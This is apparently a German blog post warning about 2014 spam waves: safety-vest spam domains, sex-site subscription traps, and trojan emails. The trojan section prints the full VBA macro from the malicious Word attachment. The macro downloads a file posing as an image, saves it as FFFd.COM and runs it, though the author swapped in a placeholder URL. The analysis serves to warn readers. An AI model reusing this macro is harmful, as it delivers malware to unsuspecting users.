SPAM: Warnwesten

Die Richpro Internet GmbH legt neue Domains für ihren Warnwestenmüll schneller an, als ich darüber schreiben kann. Nach einer „Erinnerung“ und einer „Achtung“ Mail gibt es jetzt auch die „Letzte Chance“. Ich wette, die letzte Chance ist nicht die allerletzte Chance. Folgende Domains leiten über den Server mit der IP 37.143.52.7 weiter zur Seite www.gratis-warnweste.de

  • wochenendweste.com
  • pflichtweste.com
  • bundesweste.com
  • bussgeldstelle.com

Die an die Domain angehängte kryptische Zeichenfolge scheint dabei ein Schlüssel zu E-Mails Adresse des Empfängers zu sein.

Wer unbedingt eine kostenlose Warnwesten braucht, findet diese zum Beispiel auch bei der DEKRA.

Update 14.07.2014

Timo Richert scheint noch sehr viele Warnwesten zu haben und für jede richtet er eine eigene Domain ein. 😉

  • westefueralle.com

Update 17.07.2014

Die Warnwesten sind ihm immer noch nicht ausgegangen:

  • all-weste.com

SPAM: X-Book Team und Co

Nina, Rabea und Mila vom X-Book Team oder der Freundschaftszentrale haben mich nun in den letzten Tagen auf einem Bild markiert oder als Freund bei Sex-Facebook hinzugefügt. Heute fand ich als weiteren Anbieter:

citychatter.de – 176.9.97.138

Dennis Reinert-Frerich
Hannah-Arendt-Weg 10
59063 Hamm
Bundesrepublik Deutschland
E-Mail: service@citychatter.de

AGB vom 03.05.2013

Auch hier beträgt die Vertragsstrafe 15.000 €.

Interessant ist, welche weiteren Informationen das Internet – Google – über den Inhaber Dennis Reinert-Frerich ausspuckt.

Wie es ausschaut hängt hinter Sex Facebook 18+ ein umfangreiches Affiliate Netzwerk.

Trojaner: Keine Minute vergeht in der ich nicht an dich denke

oder ähnlich lauten die Betreff Zeilen einer derzeit laufenden Welle zur Verbreitung von Trojanern. Der Text beschränkt sich auf ein oder zwei Sätze, wie:

Keine Minute vergeht in der ich nicht an dich denke, und darum schenke ich dir meine Liebe, denn ich spür, ich gehör einfach zu dir. Ich lieb dich!

D. Bischof

Angehängt ist ein ZIP-Archiv 4180.zip, in dem sich wiederum ein MS-Word Dokument abactinal642.doc mit einem Makro befindet. In diesem Fall ist nur leicht obfuskiertes Makro, das eine als Bild getarntes Programm als FFFd.COM im Profil des Nutzers abspeichert und aufruft. Den Link im Quelltext habe ich geändert, er funktioniert bereits nicht mehr.

Sub hui()
Dim DMtjPKZbDiINOsDjnWMDQUaGD As String
Dim vNFhXFNV_TueQRFNXVYWLqYTecVHXURZUNBDUyA As Integer
URL = "http://www.example.com/fotos/rollover5.jpg"
DMtjPKZbDiINOsDjnWMDQUaGD = Environ("USERPROFILE")
Dim lOMwCMuTOYqPBHJNCl: Set lOMwCMuTOYqPBHJNCl = CreateObject("Microsoft.XMLHTTP")
Dim CSGDWYMVOOBASEd: Set CSGDWYMVOOBASEd = CreateObject("Adodb.Stream")
lOMwCMuTOYqPBHJNCl.Open "GET", URL, False
lOMwCMuTOYqPBHJNCl.Send
With CSGDWYMVOOBASEd
.Type = 1
.Open
.write lOMwCMuTOYqPBHJNCl.responseBody
.SaveToFile DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM", 2
End With
Shell DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM"
End Sub